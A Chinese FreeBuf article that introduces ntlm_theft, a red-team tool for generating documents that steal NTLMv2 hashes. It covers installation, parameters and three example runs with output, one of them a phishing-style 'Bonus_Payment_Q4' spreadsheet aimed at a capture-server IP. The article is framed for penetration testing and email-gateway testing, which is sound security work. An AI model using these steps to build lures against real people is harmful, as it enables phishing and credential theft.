freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
  • 关注
如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
2021-10-02 11:22:56

关于ntlm_theft

ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。该工具适用于网络钓鱼攻击,可以用于支持外网SMB流量和内部网络环境之中。与基于宏的文档或利用漏洞的文档相比,这些文件类型的好处在于,所有的这些文件都是使用“预期功能”构建的。

使用场景

ntlm_theft主要针对渗透测试人员和红队研究人员设计,可以帮助研究人员对目标公司员工进行内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果外网防火墙上允许出站SMB访问,则它也可用于外部网络钓鱼。

工具依赖

ntlm_theft基于Python 3开发,因此我们需要在本地环境安装并配置好Python 3环境,并安装好xlsxwriter:

pip3 install xlsxwriter

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Greenwolf/ntlm_theft.git

工具参数

ntlm_theft的运行需要提供四个必要参数,一个输入格式,输入文件或目录,以及基础的运行模式:

-g, --generate : 选择生成所有文件或指定文件类型

-s, --server : SMB哈希捕捉服务器的IP地址

-f, --filename : 不包含后缀的基础文件名,之后可以进行重命名

工具运行

下面给出的工具演示样例中,我们将使用ntlm_theft生成所有文件:

# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test

Created: test/test.scf (BROWSE)

Created: test/test-(url).url (BROWSE)

Created: test/test-(icon).url (BROWSE)

Created: test/test.rtf (OPEN)

Created: test/test-(stylesheet).xml (OPEN)

Created: test/test-(fulldocx).xml (OPEN)

Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)

Created: test/test-(includepicture).docx (OPEN)

Created: test/test-(remotetempl*ate).docx (OPEN)

Created: test/test-(frameset).docx (OPEN)

Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)

Created: test/test.asx (OPEN)

Created: test/test.jnlp (OPEN)

Created: test/test.application (DOWNLOAD AND OPEN)

Created: test/test.pdf (OPEN AND ALLOW)

Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)

Generation Complete.

在下面的工具使用样例中,我们将使用ntlm_theft仅生成现代文件:

# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting

Skipping SCF as it does not work on modern Windows

Created: meeting/meeting-(url).url (BROWSE TO FOLDER)

Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)

Created: meeting/meeting.rtf (OPEN)

Created: meeting/meeting-(stylesheet).xml (OPEN)

Created: meeting/meeting-(fulldocx).xml (OPEN)

Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)

Created: meeting/meeting-(includepicture).docx (OPEN)

Created: meeting/meeting-(remotetempl*ate).docx (OPEN)

Created: meeting/meeting-(frameset).docx (OPEN)

Created: meeting/meeting-(externalcell).xlsx (OPEN)

Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)

Created: meeting/meeting.asx (OPEN)

Created: meeting/meeting.jnlp (OPEN)

Created: meeting/meeting.application (DOWNLOAD AND OPEN)

Created: meeting/meeting.pdf (OPEN AND ALLOW)

Skipping zoom as it does not work on the latest versions

Skipping Autorun.inf as it does not work on modern Windows

Skipping desktop.ini as it does not work on modern Windows

Generation Complete.

在下面的工具使用样例中,我们将使用ntlm_theft仅生成一份xlsx文件:

# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4

Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)

Generation Complete.

工具运行截图

项目地址

ntlm_theft:GitHub传送门

# 渗透测试 # 网络钓鱼 # NTLMv2哈希
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
关于ntlm_theft
    使用场景
      工具依赖
        工具下载
          工具参数
            工具运行
              工具运行截图
                项目地址